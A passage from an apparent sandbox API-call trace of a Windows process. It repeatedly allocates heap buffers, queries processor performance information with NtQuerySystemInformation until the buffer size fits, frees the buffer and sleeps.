Size=0x30) returned 0x295d7f8 [0255.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0255.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0255.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0255.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0255.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0255.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0255.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0255.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0255.973] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0255.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0255.973] Sleep (dwMilliseconds=0x110) [0256.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0256.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0256.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0256.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0256.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0256.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0256.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0256.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0256.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0256.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0256.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0256.004] Sleep (dwMilliseconds=0x110) [0256.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0256.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0256.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0256.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0256.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0256.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0256.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0256.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0256.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0256.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0256.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0256.081] Sleep (dwMilliseconds=0x110) [0256.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0256.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0256.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0256.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0256.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0256.113] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0256.114] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0256.114] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0256.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0256.114] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0256.115] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0256.115] Sleep (dwMilliseconds=0x110) [0256.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0256.144] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0256.145] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0256.145] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.146] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0256.146] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0256.146] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.146] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0256.146] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0256.146] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0256.146] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0256.146] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0256.147] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0256.147] Sleep (dwMilliseconds=0x110) [0256.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0256.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0256.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0256.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0256.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0256.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0256.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0256.161] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0256.162] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0256.162] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0256.163] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0256.163] Sleep (dwMilliseconds=0x110) [0256.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0256.177] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.178] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0256.178] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0256.178] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.179] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0256.179] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0256.179] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.180] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0256.183] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0256.183] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0256.184] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0256.184] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0256.184] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0256.186] Sleep (dwMilliseconds=0x110) [0256.233] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0256.233] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0256.234] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0256.234] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0256.234] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0256.234] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.235] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0256.235] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0256.235] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0256.235] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0256.235] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0256.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0256.236] Sleep (dwMilliseconds=0x110) [0256.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0256.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0256.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0256.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0256.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0256.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0256.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0256.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0256.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0256.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0256.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0256.253] Sleep (dwMilliseconds=0x110) [0256.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0256.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.264] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0256.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0256.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.264] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0256.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0256.265] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0256.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0256.265] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0256.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0256.266] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0256.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0256.266] Sleep (dwMilliseconds=0x110) [0256.286] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0256.286] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.287] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0256.287] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0256.287] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.287] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0256.287] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0256.287] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.288] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0256.288] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0256.288] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0256.289] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0256.289] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0256.289] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0256.289] Sleep (dwMilliseconds=0x110) [0256.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0256.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0256.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0256.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0256.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0256.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0256.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0256.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0256.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0256.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0256.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0256.298] Sleep (dwMilliseconds=0x110) [0256.319] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0256.319] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.320] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0256.320] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0256.320] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.320] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0256.320] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0256.320] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.321] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0256.325] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0256.325] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0256.326] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0256.326] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0256.326] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0256.326] Sleep (dwMilliseconds=0x110) [0256.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0256.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0256.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0256.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0256.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0256.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0256.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0256.345] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0256.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0256.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0256.346] HeapFree (in: 